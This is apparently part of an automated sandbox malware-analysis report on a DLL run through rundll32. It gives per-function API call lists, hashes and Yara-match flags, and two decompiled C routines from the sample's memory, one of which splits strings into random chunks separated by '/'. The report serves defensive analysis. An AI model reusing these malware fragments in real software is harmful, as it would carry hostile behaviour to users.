                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • GetLastError.KERNEL32(00000000), ref: 0628ECEE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: e8d1ba8e3c91555dd87fb5c0d3dd1787cc28750c50bca66969c0eb141c45f387
                                                          • Instruction ID: fe2eba52eb30171c2d3e89ea863808074dc69391e248a7791d6d2ddb480fa873
                                                          • Opcode Fuzzy Hash: e8d1ba8e3c91555dd87fb5c0d3dd1787cc28750c50bca66969c0eb141c45f387
                                                          • Instruction Fuzzy Hash: B9314575D10309FFDB61EFA1CC8499EBBB8EF48304F114969E942A2191D7719A48CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • TlsGetValue.KERNEL32(?), ref: 06284BC8
                                                          • SetEvent.KERNEL32(?), ref: 06284C12
                                                          • TlsSetValue.KERNEL32(00000001), ref: 06284C4C
                                                          • TlsSetValue.KERNEL32(00000000), ref: 06284C68
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$Event
                                                          • String ID:
                                                          • API String ID: 3803239005-0
                                                          • Opcode ID: 611eab952e688289b357c1c47bbcaae6de8bd9dfce1188f4e251afa7f02754da
                                                          • Instruction ID: bd8074a9d0d22455b50305b830a68cc946e61a178420720b3143a08114f5d1ca
                                                          • Opcode Fuzzy Hash: 611eab952e688289b357c1c47bbcaae6de8bd9dfce1188f4e251afa7f02754da
                                                          • Instruction Fuzzy Hash: 0E21EF31A21346AFCFA1BF58DD8999A7BEAFB82710B140428F912C61E1C371DC51CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0628A8C1
                                                          • memcpy.NTDLL(00000018,?,?), ref: 0628A8EA
                                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0628A929
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628A93C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 2780211928-0
                                                          • Opcode ID: 594870570db1bf85e1a9d33b69f516516e33e60128fae37ba5615a2cf7f3fa82
                                                          • Instruction ID: a8d292e26269c74fe0ff3c106bbcb4b27b2b647226acdea54b9db6e5ffb21305
                                                          • Opcode Fuzzy Hash: 594870570db1bf85e1a9d33b69f516516e33e60128fae37ba5615a2cf7f3fa82
                                                          • Instruction Fuzzy Hash: 8531A270601306AFDB619F28EC49E9A7BA9FF49320F00811AFE59D7290DB71D955CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,06273EC6), ref: 06285540
                                                            • Part of subcall function 0628550A: memset.NTDLL ref: 062855B6
                                                            • Part of subcall function 0628550A: memset.NTDLL ref: 062855CA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0628F0F5
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0628F11C
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0628F161
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0628F172
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                          • String ID:
                                                          • API String ID: 1065503980-0
                                                          • Opcode ID: a41feb45fc2beb8925cddfee8a7114a0c478ba51c4100f3fea3244b958ca021f
                                                          • Instruction ID: c9b8e455a3b52f6951f98e7977928a1c9a7b39e17ac86043635a359e5eaedbab
                                                          • Opcode Fuzzy Hash: a41feb45fc2beb8925cddfee8a7114a0c478ba51c4100f3fea3244b958ca021f
                                                          • Instruction Fuzzy Hash: 74214B71A20309BFDF91AF64ED48EAE7BBAEF44394F104024EE15E6150D7349A58DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628E0F3
                                                          • lstrlen.KERNEL32(00000000), ref: 0628E104
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • strcpy.NTDLL ref: 0628E11B
                                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0628E125
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                          • String ID:
                                                          • API String ID: 528014985-0
                                                          • Opcode ID: 0e1bb228ba7a2beb2c7ccaacf1afceb4c2770878a516c4d8da3146b6d2a4c219
                                                          • Instruction ID: 1a1817aeecd4b0fbd1fb2b69158f2076e1b6773824367e1548b1c524be416ef3
                                                          • Opcode Fuzzy Hash: 0e1bb228ba7a2beb2c7ccaacf1afceb4c2770878a516c4d8da3146b6d2a4c219
                                                          • Instruction Fuzzy Hash: 1821B371921302AFEB906F24DC49B2A77E9BF44722F058419FDE6872C1EB75D844CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                           C-Code - Quality: 78%
                                                           			// Fetches a wide string through two vtable calls and copies it into a fresh heap buffer.
                                                           			// The per-statement addresses from the report's address column are shown as trailing comments.
                                                           			// The slot names are the editor's reading of the code, not something the report states:
                                                           			// slot 0x24 (index 9) hands back a second interface pointer, slot 0x100 (index 64) on that
                                                           			// object fills a BSTR out-parameter, slot 8 is IUnknown::Release, and __imp__#6 matches
                                                           			// OLEAUT32 ordinal 6, SysFreeString, consistent with the BSTR and the API ID "FreeString" below.
                                                           			E036D264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                           				intOrPtr _v8;
                                                           				void* _v12;
                                                           				void* _v16;
                                                           				intOrPtr _t26;
                                                           				intOrPtr* _t28;
                                                           				intOrPtr _t31;
                                                           				intOrPtr* _t32;
                                                           				void* _t39;
                                                           				int _t46;
                                                           				intOrPtr* _t47;
                                                           				int _t48;
                                                           
                                                           				_t47 = __eax;	// 0x036d265b   this pointer arrives in EAX
                                                           				_push( &_v12);	// 0x036d265f
                                                           				_push(__eax);	// 0x036d2660
                                                           				_t39 = 0;	// 0x036d2661   output buffer
                                                           				_t46 = 0;	// 0x036d2663   character count
                                                           				_t26 =  *((intOrPtr*)( *__eax + 0x24))();	// 0x036d2665   this->vtbl[9](this, &_v12)
                                                           				_v8 = _t26;	// 0x036d2668   HRESULT
                                                           				if(_t26 < 0) {	// 0x036d266d   FAILED(hr)
                                                           					L13:	// 0x036d2704
                                                           					return _v8;	// 0x036d270b
                                                           				}	// 0x036d270b
                                                           				if(_v12 == 0) {	// 0x036d2676   no object yet: wait 200 ms and try once more
                                                           					Sleep(0xc8);	// 0x036d267d
                                                           					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);	// 0x036d268d
                                                           				}	// 0x036d268d
                                                           				if(_v8 >= _t39) {	// 0x036d2693   SUCCEEDED(hr); _t39 is still 0 here
                                                           					_t28 = _v12;	// 0x036d2695
                                                           					if(_t28 != 0) {	// 0x036d269a
                                                           						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);	// 0x036d26a3   obj->vtbl[64](obj, &bstr)
                                                           						_v8 = _t31;	// 0x036d26a9
                                                           						if(_t31 >= 0) {	// 0x036d26ae
                                                           							_t46 = lstrlenW(_v16);	// 0x036d26b9
                                                           							if(_t46 != 0) {	// 0x036d26bd
                                                           								_t46 = _t46 + 1;	// 0x036d26bf   include the terminator
                                                           								_t48 = _t46 + _t46;	// 0x036d26c0   byte size of the WCHAR buffer
                                                           								_t39 = E036D6D63(_t48);	// 0x036d26c9   heap allocation wrapper
                                                           								if(_t39 == 0) {	// 0x036d26cd
                                                           									_v8 = 0x8007000e;	// 0x036d26de   E_OUTOFMEMORY
                                                           								} else {	// 0x036d26cf
                                                           									memcpy(_t39, _v16, _t48);	// 0x036d26d4
                                                           								}	// 0x036d26d9
                                                           								__imp__#6(_v16);	// 0x036d26e8   SysFreeString(bstr)
                                                           							}	// 0x036d26e8
                                                           						}	// 0x036d26bd
                                                           						_t32 = _v12;	// 0x036d26ee
                                                           						 *((intOrPtr*)( *_t32 + 8))(_t32);	// 0x036d26f4   obj->Release()
                                                           					}	// 0x036d26f4
                                                           					 *_a4 = _t39;	// 0x036d26fd   out: buffer, NULL on failure or for an empty string
                                                           					 *_a8 = _t46 + _t46;	// 0x036d2702   out: byte length incl. terminator; still written when the allocation failed, so callers must check the HRESULT
                                                           				}	// 0x036d2702
                                                           				goto L13;	// 0x00000000
                                                           			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                           • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                           • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 0ff99225ce1d8659fe4b2280d8a63968f71527e28be0eb0e73a0d0e570e623fd
                                                          • Instruction ID: 3248abc2fe8ff3740742049ee2625295464525a9ffa30c4c545627f00afa4154
                                                          • Opcode Fuzzy Hash: 0ff99225ce1d8659fe4b2280d8a63968f71527e28be0eb0e73a0d0e570e623fd
                                                          • Instruction Fuzzy Hash: 69216D79D01209EFCB11EFA8D99899EBBB8FF48300B1085A9E801E7304EB30DA14CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 06272FB3
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 06272FF7
                                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0627303A
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0627305D
                                                            • Part of subcall function 0628B9E9: GetTickCount.KERNEL32 ref: 0628B9F9
                                                            • Part of subcall function 0628B9E9: CreateFileW.KERNEL32(06280971,80000000,00000003,0629A1E8,00000003,00000000,00000000,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA16
                                                            • Part of subcall function 0628B9E9: GetFileSize.KERNEL32(06280971,00000000,?,00000001,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA49
                                                            • Part of subcall function 0628B9E9: CreateFileMappingA.KERNEL32(06280971,0629A1E8,00000002,00000000,00000000,06280971), ref: 0628BA5D
                                                            • Part of subcall function 0628B9E9: lstrlen.KERNEL32(06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA79
                                                            • Part of subcall function 0628B9E9: lstrcpy.KERNEL32(?,06280971), ref: 0628BA89
                                                            • Part of subcall function 0628B9E9: HeapFree.KERNEL32(00000000,06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BAA4
                                                            • Part of subcall function 0628B9E9: CloseHandle.KERNEL32(06280971,?,00000001,?,06280971), ref: 0628BAB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                          • String ID:
                                                          • API String ID: 3239194699-0
                                                          • Opcode ID: 2e010152409e3e9d2864af29fa50695108f1da4870c083dae4342e8fdfcc4956
                                                          • Instruction ID: ce0b81c85f1accb0696ea363ae7b3a9fa6a2c03b5e6bc317af5f30cc9c8e15f3
                                                          • Opcode Fuzzy Hash: 2e010152409e3e9d2864af29fa50695108f1da4870c083dae4342e8fdfcc4956
                                                          • Instruction Fuzzy Hash: 28217C3191021ADFDF61EF65DD48EEEBBB9AF84354F140125FE25A21A0D731C509DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0629297E
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06292999
                                                          • GetLastError.KERNEL32 ref: 06292A07
                                                          • GetLastError.KERNEL32 ref: 06292A16
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalErrorLastSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 2124651672-0
                                                          • Opcode ID: dccab7c14f63cd11afbcf76bf9b18935c206d52f3c7693738b1b7b167bbb8ed9
                                                          • Instruction ID: 24e340d80ec3aa5778d9bf830788ed77020baf12c5577aa9dd43dfd027705039
                                                          • Opcode Fuzzy Hash: dccab7c14f63cd11afbcf76bf9b18935c206d52f3c7693738b1b7b167bbb8ed9
                                                          • Instruction Fuzzy Hash: 57214D32921219EFCF12CFA4D908A9E7BB5FF88720F114155FD06A2210C734DA11DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06277D99
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0627C556,?), ref: 06277DAB
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0627C556,?), ref: 06277DC3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,0627C556,?), ref: 06277DDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                          • String ID:
                                                          • API String ID: 1352878660-0
                                                          • Opcode ID: 5ecd2bf70d8cbe14d0d242d461c59f6e187eb4271bb4144b9677e3c0938fda7f
                                                          • Instruction ID: 29340f25f3a26cf224e1e1c72b7a2bc604acbb2abef7067d7814b9d3f535fd3d
                                                          • Opcode Fuzzy Hash: 5ecd2bf70d8cbe14d0d242d461c59f6e187eb4271bb4144b9677e3c0938fda7f
                                                          • Instruction Fuzzy Hash: 62119070A11229BBDF62AAA5DC88EFF7E6DEF42654F100055FA14E1090D3718A40CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,062766C0,?,00000000,?), ref: 06291CAB
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,062766C0,?,00000000,?), ref: 06291CCD
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 06291CF9
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 06291D0C
                                                            • Part of subcall function 0627B83F: strstr.NTDLL ref: 0627B917
                                                            • Part of subcall function 0627B83F: strstr.NTDLL ref: 0627B96A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3712611166-0
                                                          • Opcode ID: ebc3aefbe7197188babb243d2f14743f348185754457bf2fbeba5bc899953870
                                                          • Instruction ID: 5422aab385b44daf3e50bbc3c199a9dca991d279cf78c1d14c3ecb505e9ada68
                                                          • Opcode Fuzzy Hash: ebc3aefbe7197188babb243d2f14743f348185754457bf2fbeba5bc899953870
                                                          • Instruction Fuzzy Hash: D111377291021ABFDF51AFA6DC8CCDE7FADEF492A5B004424FA15A6110D730DA51CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?), ref: 0627A28B
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627A2A2
                                                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 0627A2AB
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0627A2C9
                                                            • Part of subcall function 06278C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 06278D0D
                                                            • Part of subcall function 06278C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61), ref: 06278D28
                                                            • Part of subcall function 06278C35: RtlEnterCriticalSection.NTDLL(0629A400), ref: 06278D4D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 105881616-0
                                                          • Opcode ID: 775c80e56bc7bd07b34f22bf1764011a5ee482bb3ebb2a93cbb688afdc686d6c
                                                          • Instruction ID: b2774f74672bcf119d76ff1678c0bc81c990937a50114d94e865fab840e5a081
                                                          • Opcode Fuzzy Hash: 775c80e56bc7bd07b34f22bf1764011a5ee482bb3ebb2a93cbb688afdc686d6c
                                                          • Instruction Fuzzy Hash: 05217C30A1030AEFDB51DFA9C849EAEBBF9EF85314F108159E906D7250DB74D981CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06291D62
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 06291D86
                                                          • RegCloseKey.ADVAPI32(?), ref: 06291DDE
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 06291DAF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                                          • String ID:
                                                          • API String ID: 453107315-0
                                                          • Opcode ID: 786fd85cc7dd797e4ed4f18d075da2bc42eb401db58371e0232ef821fe69398e
                                                          • Instruction ID: 8c385cbfb81db0fd4b5d10372e61c0bf88ca01403384b824a9e2590f2864bb86
                                                          • Opcode Fuzzy Hash: 786fd85cc7dd797e4ed4f18d075da2bc42eb401db58371e0232ef821fe69398e
                                                          • Instruction Fuzzy Hash: 652106B991010DFFDF01DF99DC888EEBBBDEF89350F208456E901A6210E3719A90DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			// Decompiler output (IDA plugin). Comments added by the editor describe what the
                                                          			// code does: it copies an input string into a new heap buffer, splitting it into
                                                          			// pseudo-randomly sized chunks (8..24 bytes) separated by '/' characters.
                                                          			E036D4162(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;                                   // input string pointer
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // unresolved import; per the APIs list this is lstrlen (ref 036D416D)
                                                          				_t38 = __eax;                                   // remaining length
                                                          				// output buffer: length + length/8 + 1, room for the inserted separators and a terminator
                                                          				_t30 = RtlAllocateHeap( *0x36da2d8, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;                                // chunk bound: min(remaining, 24)
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						// linear congruential generator on a global seed (a = 0x19660d, c = 0x3c6ef35f)
                                                          						_t21 =  *0x36da2f0; // 0x8c8786d1
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x36da2f0 = _t23;
                                                          						// chunk size = 8 + (rand16 % (bound - 8))
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);                    // copy one chunk
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;                          // stack cleanup after cdecl memcpy
                                                          						 *_t27 = 0x2f;                              // append '/' separator
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);                    // copy the tail including the NUL terminator
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          Instruction addresses for the listing above: 0x036d416a 0x036d416d 0x036d4173 0x036d418b 0x036d418d 0x036d4192 0x036d4194 0x036d4197 0x036d4199 0x036d419c 0x036d419e 0x036d419e 0x036d41a0 0x036d41ab 0x036d41b0 0x036d41c1 0x036d41c9 0x036d41ce 0x036d41d1 0x036d41d4 0x036d41d6 0x036d41d9 0x036d41dc 0x036d41dc 0x036d41df 0x036d41ea 0x036d41ef 0x036d41f9

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,036D1DC6,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D416D
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D4185
                                                          • memcpy.NTDLL(00000000,059695B0,-00000008,?,?,?,036D1DC6,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D41C9
                                                          • memcpy.NTDLL(00000001,059695B0,00000001,036D58D7,00000000,059695B0), ref: 036D41EA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: c2b726df45cf4c7e8da8f1221c6643594c62e35a89ae040340fae9c8277eaad8
                                                          • Instruction ID: 139dd87cb71c6de18b1e4834fe2c28269e6aa9dc1cfb3efb443b543a3e8caf5d
                                                          • Opcode Fuzzy Hash: c2b726df45cf4c7e8da8f1221c6643594c62e35a89ae040340fae9c8277eaad8
                                                          • Instruction Fuzzy Hash: BD113A72E00215BFC710CE6BEC84D9A7FEAEB80250B090179F404C7240EB718E148790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0628EAA8,00000000,?,00000000,0627E842,00000000,0689C310), ref: 06272646
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627265E
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0628EAA8,00000000,?,00000000,0627E842,00000000,0689C310), ref: 062726A2
                                                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 062726C3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 8179d61eadf7602b83a9e857db0bcee5e872e7b1978d974080db1f8ec4cbbea9
                                                          • Instruction ID: 37229cafeca0adf876f2f9a9d842b3589917b1cf2833264438c289ef882aeb27
                                                          • Opcode Fuzzy Hash: 8179d61eadf7602b83a9e857db0bcee5e872e7b1978d974080db1f8ec4cbbea9
                                                          • Instruction Fuzzy Hash: 2F11C672A00216EFC7508F69EC88E9EBBEEDFD5250B054176E904D7251E6719E048BB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GlobalFix.KERNEL32(00000000), ref: 0628223E
                                                          • memset.NTDLL ref: 06282252
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0628225F
                                                            • Part of subcall function 0628C563: OpenProcess.KERNEL32(00000410,B8F475FF,06282289,00000000,00000000,06282289,0000001C,00000000,00000000,?,?,?,06282289), ref: 0628C5BD
                                                            • Part of subcall function 0628C563: CloseHandle.KERNEL32(00000000,00000000,00000000,06282299,00000104,?,?,?,06282289), ref: 0628C5DB
                                                            • Part of subcall function 0628C563: GetSystemTimeAsFileTime.KERNEL32(06282289), ref: 0628C643
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0628228A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                                          • String ID:
                                                          • API String ID: 3286078456-0
                                                          • Opcode ID: 118dcec61c91091d2dad06d13bd5cbca308de6e0e43b291bff8aecbbfdd51433
                                                          • Instruction ID: 3843b4c163b588f1348a44e5240c8a69192df564086bb1fef2ec616b5af69740
                                                          • Opcode Fuzzy Hash: 118dcec61c91091d2dad06d13bd5cbca308de6e0e43b291bff8aecbbfdd51433
                                                          • Instruction Fuzzy Hash: E6114F75E11305AFDB51BBB5AC8DB9E77B9AB48611F04411AEA05F1380DB758600CEB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
